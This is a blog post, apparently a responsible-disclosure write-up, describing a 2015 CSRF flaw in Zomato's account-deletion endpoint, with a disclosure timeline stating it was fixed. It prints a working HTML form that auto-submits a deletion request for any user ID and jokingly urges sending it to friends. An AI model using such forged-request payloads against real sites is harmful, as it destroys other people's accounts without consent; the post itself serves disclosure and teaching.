How i deleted your zomato account !

Hi friends 😀 ,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was catched by it so i was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this

  zomato hack

Now to delete the account you have to type delete inside it and confirm ! but their was a flaw their was no csrf token available to validate the request ! .

What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !

Now Exploitation Part 
i created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need send this code via html  or as a link . 😛

Code ?
<html>
<body>
<form action=”https://www.zomato.com/php/delete_user_profile.php method=”POST”>

<input type=”hidden” name=”reason” value=”woot woot”>

<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>

<input type=”submit”  value=”Submit request”>

</form>

</body>
</html>

Video Poc :
save this as delete.html and send this to your friend !

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability ?

it was easy to grab any user  ==>userid by just visiting their profile and copy that user id .Which increased it severity 😉

[+] Fixing Time line

[+] July 21, 2015 Reported to CEO (Report sent to Deepinder Goyal) ,CTO
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .

Let #internet be #safer place 🙂
signoff

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s